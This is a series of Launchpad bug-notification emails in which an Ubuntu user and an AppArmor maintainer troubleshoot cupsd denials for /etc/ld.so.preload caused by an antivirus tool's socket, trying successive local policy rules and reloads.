Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  

[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

Hello snapd friends, Edson has an antivirus tool that requires all
processes have write access to a unix domain socket. Adding a rule to
/etc/apparmor.d/abstractions/base addressed many profiles but not
snapd's snap-confine profile.

What's the mechanism for admins to add local rules to this file?

Thanks

** Also affects: snapd (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : 

[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

Hi Edson.. so, the last idea I've got is:

  unix,

in /etc/apparmor.d/abstractions/base

Do the usual reload, and reboot if it worked, dance.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

On Mon, Feb 18, 2019 at 02:45:16PM -, Edson José dos Santos wrote:
> Line replaced successfully:
> 
> From: unix (connect, send, receive)
> peer=(addr="@2F746D702F65736574732E736F636B00*"),
> 
> To:   unix (connect, send, receive) peer = (addr = "@
> 2F746D702F65736574732E736F636B00 *"),

Ah, sorry, I am sleep deprived. The new line is:

  unix,

> At the moment of saving with: sudo /etc/init.d/apparmor reload the
> procedure failed and I could not copy the error message.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe 

Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

On Mon, Feb 18, 2019 at 01:26:02PM -, Edson José dos Santos wrote:
> Is it the same correct procedure?
> 
> /etc/apparmor.d/abstractions/base file:
> 
> unix (connect, send, receive) peer = (addr = "@
> 2F746D702F65736574732E736F636B00 *")
> 
> Then sudo /etc/init.d/apparmor reload
> If that appeared to work fine, then reboot.

yes, same procedure :)

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

[Seth Arnold]

Alright, I don't know why that line didn't work. Replace it with this
one:

  unix,

it's a lot more open than I'd like, but I don't know why the more
specific rule didn't work. So, lets try this.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
